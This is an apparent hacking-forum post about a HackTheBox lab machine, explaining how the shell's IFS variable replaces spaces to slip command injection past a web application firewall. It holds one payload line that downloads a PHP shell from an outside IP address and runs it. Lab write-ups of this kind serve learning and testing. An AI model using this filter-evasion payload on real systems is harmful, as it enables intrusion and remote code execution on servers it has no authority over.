Command Injection WAF Bypass with IFS
by Cr3aTor - November 19, 2019 at 03:12 PM
#1
I've recently got back into playing on HackTheBox, and I just finished the Wall box.
Along the way I've stumbled upon a webapp that was vulnerable to command injection ( it was feature actually : )) ), but I couldn't use spaces and some other special chars. So I thought that I might share some useful links and how I got around this. ( Don't expect something sophisticated )

Anyhow, I finally decided to use the IFS variable in order to add spaces between my command arguments. Therefore, the payload could look something like this:
wget${IFS}10.10.15.29${IFS}-O${IFS}/tmp/shell.php;php${IFS}shell.php
( That's not actually my HTB ip so calm down )

Now, what the hell is IFS?
You are probably familiar with it, if you ever made a bash script that needed something like this:

echo " IFS  is awesome " | while IFS= read -r line; do echo "=$line=" ; done

So it's just a special shell variable like $@ or $*  and it stands for Internal Field Separator and is usually used for word splitting and to split lines into words with the read cmd.
It's default value is <space><tab><newline>, but you can change it (in my case it wasn't needed)

That's it, I hope you learned something new (even tho this is some basic knowledge). Thanks for reading this, and for now I will let you with some delightful resources:

More about IFS Some command injection payloads
Reply
#2
intresting....................
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
SQL INJECTION STRATEGIES +CODE ramosidi04 189 11,768 November 06, 2021 at 10:07 AM
Last Post: Assmin69
Navigate the command-line like a pro. palmistry 0 127 October 16, 2021 at 08:03 PM
Last Post: palmistry
Duckademy | Mastering SQL injection (2020) ThomasPfirsich 69 5,224 October 09, 2021 at 11:55 PM
Last Post: hjvcxkk

 Users browsing this thread: 1 Guest(s)